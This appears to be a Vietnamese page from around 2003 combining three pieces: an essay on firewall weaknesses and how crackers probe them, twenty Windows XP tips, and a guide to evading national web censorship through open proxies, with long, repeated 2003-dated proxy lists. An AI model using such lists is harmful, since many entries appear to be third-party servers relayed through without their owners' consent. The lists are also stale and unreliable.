Trên lý thuyết, tường lửa là phương pháp bảo mật an toàn nhất khi mạng của bạn có kết nối Internet. Tuy nhiên, vẫn tồn tại các vấn đề xung quanh môi trường bảo mật này. Nếu tường lửa được cấu hình quá chặt chẽ, tiến trình làm việc của mạng sẽ bị ảnh hưởng, đặc biệt trong môi trường người dùng phụ thuộc hoàn toàn vào ứng dụng phân tán. Do tường lửa thực thi từng chính sách bảo mật chặt chẽ nên nó có thể bị sa lầy. Tóm lại, cơ chế bảo mật càng chặt chẽ bao nhiêu, thì tính năng càng bị hạn chế bấy nhiêu.

Một vấn đề khác của tường lửa tương tự như việc xếp trứng vào rổ. Do là rào chắn chống kết nối bất hợp pháp nên một khe hở cũng có thể dễ dàng phá huỷ mạng của bạn. Tường lửa duy trì môi trường bảo mật, trong đó nó đóng vai trò điều khiển truy nhập và thực thi sơ đồ bảo mật. Tường lửa thường được mô tả như cửa ngõ của mạng, nơi xác nhận quyền truy nhập. Tuy nhiên điều gì sẽ xảy ra khi nó bị vô hiệu hoá? Nếu một kỹ thuật phá tường lửa được phát hiện, cũng có nghĩa người vệ sĩ bị tiêu diệt và cơ hội sống sót của mạng là rất mỏng manh.

Vì vậy trước khi xây dựng tường lửa, bạn nên xem xét kỹ và tất nhiên phải hiểu tường tận về mạng của mình.

Phải chăng tường lửa rất dễ bị phá?

Câu trả lời là không. Lý thuyết không chứng minh được có khe hở trên tường lửa, tuy nhiên thực tiễn thì lại có. Các cracker đã nghiên cứu nhiều cách phá tường lửa. Quá trình phá tường lửa gồm hai giai đoạn: đầu tiên phải tìm ra dạng tường lửa mà mạng sử dụng cùng các loại dịch vụ hoạt động phía sau nó; tiếp theo là phát hiện khe hở trên tường lửa ố giai đoạn này thường khó khăn hơn. Theo nghiên cứu của các cracker, khe hở trên tường lửa tồn tại là do lỗi định cấu hình của người quản trị hệ thống, sai sót này cũng không hiếm khi xảy ra. Người quản trị phải chắc chắn sẽ không có bất trắc cho dù sử dụng hệ điều hành (HĐH) mạng nào, đây là cả một vấn đề nan giải. Trong các mạng UNIX, điều này một phần là do HĐH UNIX quá phức tạp, có tới hàng trăm ứng dụng, giao thức và lệnh riêng. Sai sót trong xây dựng tường lửa có thể do người quản trị mạng không nắm vững về TCP/IP (Transmission Control Protocol/ Internet Protocol).

Một trong những việc phải làm của các cracker là tách các thành phần thực ra khỏi các thành phần giả mạo. Nhiều tường lửa sử dụng trạm hy sinh (sacrificial hosts) - là hệ thống được thiết kế như các server Web (có thể sẵn sàng bỏ đi) hay bẫy (decoys), dùng để bắt các hành vi thâm nhập của cracker. Bẫy có thể cần dùng tới những thiết bị ngụy trang phức tạp nhằm che dấu tính chất thật của nó, ví dụ: đưa ra câu trả lời tương tự hệ thống tập tin hay các ứng dụng thực. Vì vậy, công việc đầu tiên của cracker là phải xác định đây là các đối tượng tồn tại thật.

Để có được thông tin về hệ thống, cracker cần dùng tới thiết bị có khả năng phục vụ mail và các dịch vụ khác. Cracker sẽ tìm cách để nhận được một thông điệp đến từ bên trong hệ thống, khi đó, đường đi được kiểm tra và có thể tìm ra những manh mối về cấu trúc hệ thống.

Ngoài ra, không tường lửa nào có thể ngăn cản việc phá hoại từ bên trong. Nếu cracker tồn tại ngay trong nội bộ tổ chức, chẳng bao lâu mạng của bạn sẽ bị bẻ khoá. Thực tế đã xảy ra với một công ty dầu lửa lớn: một tay bẻ khoá trà trộn vào đội ngũ nhân viên và thu thập những thông tin quan trọng không chỉ về mạng mà còn về các trạm tường lửa.

Lời kết

Hiện tại, tường lửa là phương pháp bảo vệ mạng phổ biến nhất, 95% cộng đồng phá khoá phải thừa nhận là dường như không thể vượt qua tường lửa. Song trên thực tế, tường lửa đã từng bị phá. Nếu mạng của bạn có kết nối Internet và chứa dữ liệu quan trọng cần được bảo vệ, bên cạnh tường lửa, bạn nên tăng cường các biện pháp bảo vệ khác.

Xem tiếp cách thức vượt tường lửa.

20 điều bạn chưa biết về WinXP :

1-

Bạn hãy vào command prompt trong Accessories từ All Programs>>Nút Start đánh vào lệnh

systeminfo

bạn sẽ được Windows đưa ra rất là nhiều những thông tin hữu ích về hệ thống cho bạn, bạn có thể lưu lại những thông tin này để xem sau cũng được bằng lệnh

systeminfo >info.txt

chẳng hạn. bạn sẽ tìm thấy file này ở C:documents and settings ên profile của bạn(tên logon)info.txt (dùng cho Windows XP Pro only)

2-

Bạn có thể DELETE ngay lập tức tất cả các file mà không cần cho nó vào recycle bin bằng cách vào Start>>Run đánh vào lệnh gpedit.msc sau đó chọn User ConfigurationAdministrative TemplatesWindows ComponentsWindows Explorer tìm file có tên Do not move DELETE files to the Recycle Bin setting, chọn enable nó lên là từ nay nó sẽ không vào Recycle Bin nữa. Ngoài tính năng trên gpedit.msc còn có rất nhiều lựa chọn khác cho bạn để tối ưu hoá, hạn chế không cho chạy một số phần mềm, thêm Java Script vào logon hay Shutdown rất hay.

Để không cho chạy một phần mềm ứng dụng nào mà bạn thích thì hãy vào User ConfigurationAdministrative TemplatesSystemDo not Run The Specified Windows Application và enable chức năng này lên sau đó chọn SHOW và thêm vào những lệnh mà bạn có thể gọi nó từ Menu StartRun ví dụ như winword.exe, poledit.exe....vv. Ngoài ra vẫn còn nhiều lựa chọn khác đang chờ bạn khám phá.(Windows XP Pro và Windows 2K Pro)

3-

Bạn có thể khoá XP station với hai lần click chuột, hãy tạo một shortcut mới trên desktop bằng cách bấm chuột phải chọn NewShortcuttrong trường Location Field hãy điền vào hàng 'rundll32.exe user32.dll,LockWorkStation' sau đó đặt tên shortcut mà bạn thích từ nay trở đi chỉ cần click chuột vào shortcut trên desktop thì bạn có thể khoá máy lại được rồi ngoài ra bạn cũng có thể sử dụng Windows Key + phím L với tính năng tương tự.

4-

Windows XP đã che đi một số phần mềm hệ thống mà bạn muốn remove nó ra khỏi máy ví dụ như là Windows Messenger. Bạn chọn ToolsFolder options ab Viewchọn SHOW hiden files and folder sau đó thì vào C:Windowsinfsysoc.inf hãy mở file này bằng notepad và tìm tất cả những chữ hide xoá đi sau đó lưu lại và vào StartSettingsControl PannelAdd and Remove Programsadd emove Windows Components để bỏ đi chức năng Windows Messenger.

5-

Windows XP hỗ trợ IPv6 là thế hệ IP kế tiếp nhưng đáng tiếc là các nhà cung cấp dịch vụ internet chưa sử dụng IPv6 này. bạn có thể thử trong mạng LAN bằng lệnh "ipv6 install" trong StartRun nó sẽ không huỷ bỏ hệ thống hiện tại của bạn, sau đó đánh lệnh ipv6 /? để biết thêm chi tiết.

6-

XP có thêm một số lệnh rất là thú vị trong DOS batch file ví dụ như lệnh "eventcreate","eventtriggers" dùng để tạo và theo dõi events của hệ thống "typeperf" dùng để theo dõi hoạt động của nhiều trình phụ và cuối cùng là "schtasks" dùng để điều khiển Task Schedule. cũng giống như các lệnh khác thì bạn có thể dùng công cụ hỗ trợ /? để tham khảo thêm những lựa chọn cho phép của lệnh.

7-

Bây giờ bạn có thể bỏ đi một số chức năng đang thực thi trên máy tính của bạn bằng lệnh "taskkill /pid" hay tskill và số task mà bạn muốn dừng lại.Để biết được số task đang chạy thì bạn dùng lệnh tasklist để tham khảo, nó sẽ hiển thị những hoạt động trong hệ thống.

8-

Windows XP được tích hợp hệ thống nén zip, đối với máy chạy nhanh thì không sao nhưng nếu máy bạn chạy chậm và bạn muốn bỏ chức năng này đi thì ở dòng command line đánh lệnh : 'regsvr32 /u zipfldr.dll' nếu bạn thay đổi ý kiến muốn sử dụng lại thì có thể dùng lệnh : 'regsvr32 zipfldr.dll'

9-

XP có một chức năng đó là chống hiện tượng răng cưa (anti-alias) của font chữ, chức năng này nguyên thuỷ không được bật lên cho nên bạn phải bật nó lên trong màn hình desktop ight click chọn propertiesAppearanceEffect chọn Cleartype kết quả có thể hiển thị tốt đối với máy Laptop. Nếu bạn muốn sử dụng chức năng ClearType đối với cả màn hình Login thì bạn hãy làm như sau : vào StartRun egedit chọn key HKEY_USERS/.DEFAULT/Control Panel/Desktop/chọn String FontSmoothing cho giá trị 2. bạn nhớ sử dụng quyền administrator để chỉnh sửa registry nhé.

10-

Sử dụng chức năng Remote Assistance để nối mạng với một ai đó đang sử dụng mạng ở nhà (NAT) trước tiên bạn phải yêu cầu người đó gởi một Remote Assistance Invitation bằng mail cho bạn và bạn phải hiệu chỉnh lại file ở dưới thuộc tính RCTICKET sẽ là NAT IP address chẳng hạn như là 192.168.1.10 hãy thay thế với số địa chỉ IP thực của người bạn mà bạn sẽ kết nối. bạn có thể tham khảo tại chi tiết thêm tại

http://k.domaindlx.com/clairsang/www.whatismyip.com/t_blank

và chắc chắn rằng cỗng mở sẽ là 3389 để có thể mở firewall và vào máy.

11-

Bạn có thể chạy ứng dụng với nhiều user khác nhau mà không cần phải logout và login trở lại bằng cách bấm chuột phải vào icon rồi chọn Run As sau đó nhập vào user name và password mà bạn muốn sử dụng. một số chương trình đòi hỏi bạn phải có quyền của administrator mới được cài đặt hay chạy bạn có thể nhập vào password của admin để chạy ứng dụng.

12-

XP được trang bị hệ thống tự động upgrade, đăng ký passport hay sử dụng Windows Messenger và nó sẽ mở một balloon tip ở system tray hay program khi bạn cài đặt một phần mềm ứng dụng mới để bỏ nó đi hãy mở Regedit theo đường dẫn sau HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced tạo một Dword có tên là EnableBalloonTips với giá trị bằng 0

13-

Bạn có thể khởi động vào Windows XP mà không cần phải nhập user name hay password, hãy vào StartRun nhập vào 'control userpasswords2' nó sẽ mở cho bạn một cửa sổ ứng dụng của user account, trong user tab bỏ đi CHECK box của dòng Users Must Enter A User Name And Password To Use This Computer chọn ok, một bảng Automatically Log On sẽ xuất hiện, hãy nhập vào user name và password mà bạn muốn nó tự động logon.

14-

Internet Exporer Version 6.0 sẽ tự động xoá những temporary internet files nếu như bạn muốn, hãy vào ToolsInternet optionsAdvanced tabSecurity chọn hàng Empty Temporary Internet Files folder when browser is closed.

15-

XP cung cấp khả năng theo dõi network nếu như bạn không thấy được đèn led hoạt động của card mạng thì bạn có thể right click vào My Network Places chọn Properties ight click vào Local Area ConnectionProperties chọn dòng Show icon in notification area when connected trong system tray sẽ xuất hiện một màn hình kết nối giống như dial up để cho bạn theo dõi hoạt động của card mạng.

16-

Bạn có thể chỉnh sửa lại thời gian mà menu có thể xuất hiện nhanh hơn bằng cách vào registry HKEY_CURRENT_USER/Control Panel/Desktop/tìm REG-SZ có tên MenuShowDelay cho nó giá trị từ 0 tới 999 tuỳ bạn đơn vị được tính bằng milliseconds.

17-

Bạn có thể thay đổi tên tập tin hàng loạt bằng cách chọn tất cả các tập tin cần chọn sau đó bấm chuột phải vào một folder và chọn Rename tất cả các tập tin sẽ được đổi tên và đánh dấu theo thứ tự số để phân biệt.

18-

Trong trình duyệt Window Media Player sẽ thể hiện cover của CD trong khi chơi nhạc, nếu như Windows Media Player tìm thấy những file ảnh này trong qua trình copy đĩa nhạc vào thì nó sẽ thể hiện hình đó, nếu bạn có nhiều file Pre-WMP bạn cũng có thể copy một file hình dạng JPG chép vào folder chứa track để thể hiện hình ảnh cover. Window Media Player sẽ thể hiện hình ảnh đó vào album cho bạn.

19-

Những phím tắt để gọi System Properties (Windows key + Break), Desktop (Windows key + D), Task bar bottom (Windows key + tab)

20-

XP cung cấp cho chúng ta một chương trình screensaver ở dạng slide rất tiện bạn có thể bỏ hình ảnh của mình để chạy slide tuỳ thích

Vượt tường lửa

Theo thông tin cắt nhặt được thì hiện nay Việt Nam chúng ta cùng với 21 nước nữa trên thế giới dùng cái Tường lửa (firewall) để quản lý Văn hoá trên mạng Internet tại mỗi nước theo quan điểm khác nhau.

Ở Việt Nam chúng ta thì tất cả mọi con đường của Internet đến với bạn dù bất cứ đâu trên toàn lãnh thổ đều phải qua một trạm kiểm soát Văn hoá này nó được gọi là Proxy và được đặt ngay tại Thủ đô Hà Nội của chúng ta và tôi cũng không rõ nó nằm ở đâu. Nó hoạt động cũng khá hay là bất cứ một trang Web nào được bạn duyệt trên máy tính của bạn thì trước hết nó phải được kiểm duyệt ở cái Proxy này và nếu nó thuộc trong danh sách cấm không được vào thì bạn có vào mãi thì cũng thế thôi .Nó thuộc danh sách cấm tức là nó bị chặn tường lửa rồi đó. Khi bị chặn tường lửa thì bạn cứ tưởng cái trang Web của bạn đang vào là không tồn tại vì nó cứ báo là "The page cannot be displayed" vv.. tức là có ý là : Nó không tìm thấy hay không tồn tại. Nhưng thực ra nó vẫn cứ sờ sờ tồn tại trên mạng mới chít chứ hic hic .Nếu bạn tin là nó không tồn tại thì hãy mail sang bên Lào cho anh bạn nào đó hỏi xem anh ấy có vào được không nha .

Và bây giờ bạn cùng tôi trèo qua tường xem có được không nhé !

1.

Nếu bạn vào net ở nhà thì bạn mở IE lên rồi vào tool -> internet Option -> connections -> setting đánh dấu 2 mục ở proxy server. Chỗ address và port bạn điền vào những thứ này tùy ý bạn chọn

68.202.81

138.81.11.3

144.92.104.66

210.99.199.227

ws13.lumedia.fi:80

218.65.110.14:80

218.145.25.47:80

211.233.80.64:80

211.233.80.22:80

211.233.27.189:80

203.113.34.239:80

24.41.27.57

170.224.224.37

217.172.180.178

210.146.44.245

63.100.18.2:80

63.193.207.2:80

nfdh.org:80

ftp.aparizona.com:80

tmc01.tmcgroup.com:80

124.125.252.64.snet.net:80

dns.urkraft.se:80

ns.dainichi-el.co.jp:80

206.105.71.2:80

216.235.32.126:80

ns.cyberlinks-jp.com:80

210.163.167.162:80

64.5.220.82:80

204.196.104.27:80

211.20.195.43:80

internet-server.ebf.com.br:80

211.100.0.34:80

61.142.169.98:80

163.29.140.66:80

ns.proserv.co.jp:80

207.225.63.2:80

sv1.ura.co.jp:80

www.jps-print.com:80

www.nisshin-syouji.co.jp:80

ns.itac-ao.co.jp:80

210.255.65.2:80

gauntlet1.huntlas.co.za:80

srv-2tee-lamias.fth.sch.gr:80

210.175.125.34:80

www.qdh.or.jp:80

mail1.found.co.jp:80

sdsl-64-7-12-211.dsl.chi.megapath.net:80

ns.tew-j.com:80

211.20.154.178:80

pbc.edu.gd:80

210.74.254.35:80

210.176.230.29:80

202.39.21.122:80

ns.factornet.co.jp:80

212.150.12.21:80

212.150.215.4:80

212.154.175.227:80

212.155.109.161:80

TK212017066196.teleweb.at:80

chello212017083078.11.vie.surfer.at:80

mail.buehlermotor.com.mx:80

212.187.53.133:80

www.davidblowers.co.uk:80

wireless-067-159.tele2.co.uk:80

wireless-069-070.tele2.co.uk:80

212.204.48.210:80

các proxy này dùng port 80

xong rồi OK thế là trèo vô tư như khỉ vậy

2.

Nếu bạn vào net ở ngoài dịch vụ thì bạn vào mở IE lên rồi vào tool -> internet Option -> connections ->LAN setting đánh dấu chọn 2 ô ở proxy server rồi nhập proxy và port vào thế là trèo vô tư.

Nếu dùng hết mấy cái proxy ở trên mà vẫn không trèo vào được (bạn quả là người giàu có và kiên trì ), thì bạn thử tiếp mấy cái này nhé :

212.242.48.148 80 Anonymous Denmark Mon Jan 27 2003 - 0:06:27

218.145.25.108 8081 High anonymity Korea, Republic Of Sun Jan 26 2003 - 16:38:31

200.33.141.222 3128 High anonymity Mexico Sun Jan 26 2003 - 16:35:30

216.248.146.51 80 Anonymous United States Sun Jan 26 2003 - 15:30:14

4.33.21.74 80 Anonymous United States Sun Jan 26 2003 - 15:26:57

isdn02201.cultura.com.br 80 High anonymity Brazil Sun Jan 26 2003 - 14:50:39

194.muja.pitt.washdctt.dsl.att.net 80 Anonymous United States Sun Jan 26 2003 - 14:47:48

216.93.126.55 8080 High anonymity United States Sun Jan 26 2003 - 13:39:33

200.171.25.187 8080 High anonymity Brazil Sun Jan 26 2003 - 13:38:08

202.9.136.40 8080 Anonymous India Sun Jan 26 2003 - 10:26:13

66.13.59.195 80 High anonymity United States Sun Jan 26 2003 - 5:18:48

proxy.itbnet.de 3128 Anonymous Germany Sun Jan 26 2003 - 5:04:45

202.54.13.146 80 High anonymity India Sun Jan 26 2003 - 5:04:29

202.156.2.50 8080 High anonymity Singapore Sun Jan 26 2003 - 5:04:22

213.25.171.33 80 High anonymity Poland Sun Jan 26 2003 - 5:04:01

62.81.235.6 80 High anonymity Spain Sun Jan 26 2003 - 5:03:05

62.20.2.35 80 Anonymous Sweden Sun Jan 26 2003 - 4:52:56

213.4.108.197 80 High anonymity Spain Sun Jan 26 2003 - 4:34:27

213.38.21.78 8080 Anonymous England Sun Jan 26 2003 - 3:59:20

virtual.v3.chollian.net 80 High anonymity Korea, Republic Of Sun Jan 26 2003 - 3:36:20

62.48.68.46 80 High anonymity Germany Sun Jan 26 2003 - 3:21:08

creative-capital.org 80 High anonymity United States Sun Jan 26 2003 - 2:01:45

cflow-ap-195.socal.rr.com 80 High anonymity United States Sun Jan 26 2003 - 2:00:35

66.172.1.182 80 High anonymity United States Sun Jan 26 2003 - 1:58:31

63.143.108.68 80 High anonymity United States Sun Jan 26 2003 - 1:57:54

200.194.232.4 8080 High anonymity Brazil Sun Jan 26 2003 - 1:15:01

208.187.125.6 8080 High anonymity United States Sun Jan 26 2003 - 1:12:51

proxy.cedunet.com 8080 Transparent Finland Sat Jan 25 2003 - 23:29:45

kisnsvr.e-showcase.com.sg 8080 High anonymity Singapore Sat Jan 25 2003 - 22:23:55

200.190.39.82 80 Anonymous Brazil Sat Jan 25 2003 - 21:56:16

203.108.113.194 80 Anonymous Australia Sat Jan 25 2003 - 20:10:25

200.85.45.206 80 Transparent Paraguay Sat Jan 25 2003 - 18:45:12

61.131.48.219 80 Anonymous China Sat Jan 25 2003 - 18:44:28

211.233.27.189 80 Anonymous Korea, Republic Of Sat Jan 25 2003 - 18:44:06

web.shc.ac.th 80 Anonymous Thailand Sat Jan 25 2003 - 18:42:43

217.156.79.193 80 High anonymity Romania Sat Jan 25 2003 - 18:35:49

195.167.65.222 80 High anonymity Greece Sat Jan 25 2003 - 18:34:02

212.98.229.24 80 High anonymity Turkey Sat Jan 25 2003 - 18:19:28

203.235.116.144 80 High anonymity Korea, Republic Of Sat Jan 25 2003 - 18:18:01

61.221.123.236 80 High anonymity Taiwan, Province Of China Sat Jan 25 2003 - 18:17:22

by-tor.2112.net:3218

211.252.237.38:3128

217.8.33.66:3218

bpubl007.hgo.se:3128

200-207-119-143.dsl.telesp.net.br:3128

200-207-128-165.dsl.telesp.net.br:3128

aworklan003105.netvigator.com:3128

210.21.93.141:3128

211.141.154.93:3128

212-170-23-125.uc.nombres.ttd.es:3128

212.49.87.254:3128

217-127-248-37.uc.nombres.ttd.es:3128

217.218.15.133:3128

218.21.77.218:3128

218.21.77.54:3128

218.5.135.228:3128

218.5.148.165:3128

218.5.185.239:3128

61.150.94.139:3128

62.153.147.198:3128

62.3.45.196:3128

211.20.195.43:3128

bpubl007.hgo.se:3128

200-207-119-143.dsl.telesp.net.br:3128

200-207-128-165.dsl.telesp.net.br:3128

aworklan003105.netvigator.com:3128 212-170-23-125.uc.nombres.ttd.es:3128

211.141.154.93:3128

217-127-248-37.uc.nombres.ttd.es:3128

210.21.93.141:3128

217.218.15.133:3128

218.21.77.218:3128

218.21.77.54:3128

218.5.135.228:3128

218.5.148.165:3128

218.5.185.239:3128

61.150.94.139:3128

62.153.147.198:3128

62.3.45.196:3128

line132-177.adsl.actcom.co.il:6588

mail.theweb.co.uk:8888

uu194-7-54-90.unknown.uunet.be:81

211.114.194.58:8081

203.115.234.98:8494

saturn.littleb.com:8888

210.145.17.38:8180

210.145.17.38:8280

211.20.195.43:3128 211.100.0.34:8088

212.68.202.81

138.81.11.3

144.92.104.66

210.99.199.227

ws13.lumedia.fi:80

218.65.110.14:80

218.145.25.47:80

211.233.80.64:80

211.233.80.22:80

211.233.27.189:80

203.113.34.239:80

24.41.27.57

170.224.224.37

217.172.180.178

210.146.44.245

63.100.18.2:80

63.193.207.2:80

nfdh.org:80

ftp.aparizona.com:80

tmc01.tmcgroup.com:80

124.125.252.64.snet.net:80

dns.urkraft.se:80

ns.dainichi-el.co.jp:80

206.105.71.2:80

216.235.32.126:80

ns.cyberlinks-jp.com:80

210.163.167.162:80

64.5.220.82:80

204.196.104.27:80

211.20.195.43:80

internet-server.ebf.com.br:80

211.100.0.34:80

61.142.169.98:80

163.29.140.66:80

ns.proserv.co.jp:80

207.225.63.2:80

sv1.ura.co.jp:80

www.jps-print.com:80

www.nisshin-syouji.co.jp:80

ns.itac-ao.co.jp:80

210.255.65.2:80

gauntlet1.huntlas.co.za:80

srv-2tee-lamias.fth.sch.gr:80

210.175.125.34:80

www.qdh.or.jp:80

mail1.found.co.jp:80

sdsl-64-7-12-211.dsl.chi.megapath.net:80

ns.tew-j.com:80

211.20.154.178:80

pbc.edu.gd:80

210.74.254.35:80

210.176.230.29:80

202.39.21.122:80

ns.factornet.co.jp:80

212.150.12.21:80

212.150.215.4:80

212.154.175.227:80

212.155.109.161:80

TK212017066196.teleweb.at:80

chello212017083078.11.vie.surfer.at:80

mail.buehlermotor.com.mx:80

212.187.53.133:80

www.davidblowers.co.uk:80

wireless-067-159.tele2.co.uk:80

wireless-069-070.tele2.co.uk:80

212.204.48.210:80

mail.arena-it.co.uk:80

mail.bss-ltd.com:80

212.251.36.62:80

212.252.105.35:80

212.27.114.1:80

212.31.98.18:80

212.42.166.98:80

ath-s2.athen.goethe.org:80

is2.isys.no:8000

212.80.166.163:80

213.11.85.249:80

213.121.248.138:80

213.121.248.147:80

213.121.248.90:80

213.121.248.96:80

eblock-202.adsl.newnet.co.uk:80

213.136.147.254:80

213.16.133.130:80

witloxproxy.knoware.nl:80

213.176.28.6:80

213.227.69.247:80

213.25.170.194:80

213.25.29.12:80

object.wackenhut.gr:80

213.56.134.17:80

sub-166ip130.carats.net:80

adsl-216-158-25-110.cust.oldcity.dca.net:80

216-180-160-009.fsi.net:80

normandintransit.com:80

216-238-112-40.dsl.ct.thebiz.net:80

host-216-252-226-

216.72.127.238:80

216.72.196.21:80

www.cotecna.com.co:80

216.72.63.198:80

217.129.0.210:80

cobalt3.cotel.de:80

host217-34-194-49.in-addr.btopenworld.com:80

host162-14.pool21756.interbusiness.it:80

ns.tachyon.co.jp:80

2.magicbird.co.jp:80

htinet-svr.hontsubo.co.jp:80

static172-4-151-24.nt01-c3.cpe.charter-ne.com:80

cpe-24-221-170-209.ca.sprintbbd.net:80

61.11.26.150:80

dns1.koibuchi.ac.jp:80

mail.koibuchi.ac.jp:80

rmc01.rmcsocio.ne.jp:80

61.131.0.172:80

61.131.0.226:80

61.131.48.219:80

61.133.63.129:80

61.136.16.228:80

61.142.15.163:80

61.163.229.38:80

61.74.65.97:80

61.74.65.98:80

62.153.108.66:80

62.159.70.194:80

proxy.sca.cnrs.fr:80

proxy.airspan.com:80

62.3.45.196:80

164.58.28.250:80

web.khi.is:80

ask.imv.au.dk:80

westbu.lnk.telstra.net:80

server.clarktoyota.com:80

ns2.rpa.ca:80

customer-148-223-48-114.uninet.net.mx:80

dhcp-130.fegs.org.ve:80

ucv10.ucv.cl:80

164.58.18.25:80

166.114.127.6:80

166.114.173.3:80

168.243.149.225:80

ns1.nissinhkltd.com.hk:80

193.128.109.54:80

www.bhakleibnitz.asn-graz.ac.at:80

193.188.101.146:80

193.194.168.15:80

193.220.32.246:80

libsrv.peto.hu:80

193.227.168.211:80

AStrasbourg-201-2-1-26.abo.wanadoo.fr:80

193.68.37.245:80

nw155-226.indigo.ie:80

gennet.gennet.ee:80

194.219.153.210:80

194.228.105.146:80

c2fa963f.adsl.oleane.fr:80

194.6.1.219:80

srv-6gym-kalam.mes.sch.gr:80

srv-1sek1-kalam.mes.sch.gr:80

194.65.77.1:80

194.79.97.69:80

195.126.227.35:80

195.130.88.40:80

pools1-31.adsl.nordnet.fr:80

pools1-98.adsl.nordnet.fr:80

195.167.64.193:80

knowledge.esaars.dk:80

server.elelm-nyh.sulinet.hu:80

server.sztmargitgimi.sulinet.hu:80

los.micros.com.pl:80

server3.telekom.hr:80

195.47.14.193:80

195.53.242.35:80

196.23.147.34:80

196.25.123.145:80

slip53.new.co.za:80

196.40.43.34:80

199.222.69.150:80

199.250.215.146:80

musalemnt.notariamusalem.cl:80

200.135.246.2:80

200.164.56.24:80

200-168-4-236.dsl.telesp.net.br:80

internetdigital.grupogazeta.com.br:80

200.190.117.115:80

200.194.97.10:80

200.195.52.193:80

200.202.227.1:80

200-204-148-171.dsl.telesp.net.br:80

200-204-182-137.dsl.telesp.net.br:80

200-204-75-246.dsl.telesp.net.br:80

200.211.98.5:80

as400web.cuatrocaminos.com.mx:80

cube.telinet.com.mx:80

isdn02201.cultura.com.br:80

isdn02204.cultura.com.br:80

200.24.214.132:80

isdn03021.cultura.com.br:80

200.248.115.130:80

adao.dei.unicap.br:80

200.252.154.207:80

200.252.154.216:80

200.27.152.3:80

200.28.88.194:80

mail.covial.gob.gt:80

ddbguate.com.gt:80

mail.care.org.gt:80

hosa.com.ec:80

gps02.greatplains.com.co:80

200.32.69.121:80

200-34-251-125.sophialabs.com:80

r200-40-206-134.adinet.com.uy:80

200.46.109.82:80

int-200-49-212-32.movi.com.ar:80

200.51.156.93:80

advance40-34.infovia.com.ar:80

200.52.4.82:80

correo.cfired.org.ar:80

host141086.metrored.net.ar:80

r200-61-110-62.multitel.net.uy:80

catriel-ar-host-196-1.customer.tiba.com:80

icafal-nt.icafal.cl:80

mail.bcero.cl:80

200.74.140.138:80

202.104.20.181:80

202.106.139.88:80

202.108.122.38:80

202.110.204.18:80

202.110.220.14:80

202.129.4.8:80

202.145.140.1:80

mail.jjs.or.id:80

chinfoh.com.my:80

202.186.33.157:80

zaitun.com.my:80

lisa.mir.com.my:80

202.28.68.18:80

c155.h202052079.is.net.tw:80

cair.res.in:80

202.56.136.210:80

202.66.101.210:80

mail.usclcargo.com.hk:80

202.93.253.33:80

202.97.161.206:80

203.107.229.2:80

bmihms-s.ozemail.com.au:80

203.113.34.239:80

203.116.111.196:80

203.151.40.4:80

203.155.172.60:80

203.155.206.161:80

203.155.9.158:80

waroona.wa.edu.au:80

203.162.12.106:80

203.162.6.45:80

203.179.49.74:8080

203186146161.ctinets.com:80

203.197.166.198:80

esjv.com.hk:80

ipvpn010013.netvigator.com:80

ipvpn034140.netvigator.com:80

203.199.147.126:80

203.200.75.165:80

203.234.17.49:80

203.235.26.1:80

203.236.83.129:80

203.241.151.50:80

zero.bora.net:80

cp.chollian.net:80

203.58.162.36:80

yuluma.wa.edu.au:80

203.69.244.194:80

203.93.218.65:80

204.101.186.234:80

205.250.90.2:80

fun1.clmb.edge.net:80

cfw.candw.lc:80

io.sunrem.com:80

wc-212.sintmaarten.net:80

www.antigua.com:80

Wall-1.Equinox-Group.com:80

207.219.100.35:80

207.236.59.162:80

207.236.70.2:80

207.246.105.209:80

mail.alexisnihon.com:80

207.61.253.50:80

vpr.lrplot.com:80

209.11.224.70:80

209.11.47.214:80

209.110.70.11:80

209.142.226.2:80

h209-17-147-1.gtconnect.net:80

209.180.208.4:80

209.182.73.114:80

209.31.157.2:80

209.31.157.33:80

lin-dsl-static-209-50-21-138.inetnebr.com:80

209.53.200.33:80

h209-71-201-65.gtconnect.net:80

cr2098859123.cable.net.co:80

mail.unibase.com.co:80

mail.unisol.com.ar:80

210.0.200.211:80

210.12.192.35:80

210.12.86.181:80

mh.sci-tennis.net:80

sv3.bunsei.ac.jp.144.40.145.210.in-addr.arpa:80

will.eyecatcher.co.jp:80

rainier.midx.com:80

ns.okumaseibido.co.jp:80

210.181.4.193:80

210.184.32.220:80

pc100.ocdi.or.jp:80

www.city.hekinan.aichi.jp:80

210.242.164.150:80

www.jcn.co.jp:80

210.52.46.29:80

smtp.greenharvest.co.nz:80

pxylhr.comsats.net.pk:80

210.66.193.222:80

210.8.133.185:80

210.94.255.160:80

210.97.78.253:80

ns.kagaku-k.co.jp:80

ns.21-zentsu.com:80

ns.reuse.or.jp:80

www.kan-shoku.co.jp:80

ns.toyoriko.co.jp:80

211.114.116.60:80

211.154.53.161:80

211.162.0.33:80

211.162.108.49:80

211.163.56.77:80

211.163.94.81:80

211.165.192.8:80

211.17.150.163:80

211.183.77.59:80

211.183.77.60:80

211.20.68.74:80

211.233.68.202:80

211.234.62.169:80

211.35.78.36:80

dns1.daiken-c.co.jp:80

dns.lpgc.or.jp:80

211.90.31.53:80

211.91.239.253:80

211.97.213.18:80

212.0.145.34:80

212.118.2.194:80

212.12.230.180:80

enteleca-2.dsl.easynet.co.uk:80

212.141.19.132:80

203.17.102.91:8080

66.7.97.33:8080

cache51.156ce.scvmaxonline.com.sg:8080

211.114.193.234:8080

dhcp-12-163-7-33.plantationcable.net:8080

ticonderogak12.org:8080

adsl-65-43-76-37.dsl.chcgil.ameritech.net:8080

rrcs-ma-24-56-79-117.biz.rr.com:8080

prrd.monarch.net:8080

ip116.gte8.rb1.bel.nwlink.com:8080

202.29.15.4:8080

210.117.67.218:8080

210.120.128.117:8080

210.117.67.214:8080

202.181.176.110:8080

yuba5.yuba.net:8080

210.117.67.218:8080

210.120.128.117:8080

210.117.67.214:8080

130.228.101.40:8080

203.17.102.91:8080

66.7.97.33:8080

203.235.116.158:80

203.17.102.91:8080

webmail.alami.net:8080

63.193.207.2:8080

dell.compleat.com:8080

80.196.228.136:8080

adsl-63-192-134-107.dsl.snfc21.pacbell.net:8080

210.145.17.38:8080

212.15.17.210:8080

212.31.116.98:8080

AS7000_1B.sfn.co.jp:8080

adsl-64-164-243-146.dsl.lsan03.pacbell.net:8080

fhm.fhm.fhg.de:8080

nt1public.mcnet.ch:8080

mail.1ainfo.ch:8080

202.39.225.81:8080

166.114.173.3:8080

168.216.25.172:8080

193.188.87.35:8080

193.188.95.146:8080

194.78.66.68:8080

212.80.166.163:8080

pandora.teimes.gr:8080

pc1.kronospan.com.cy:8080

211.20.195.43:8080

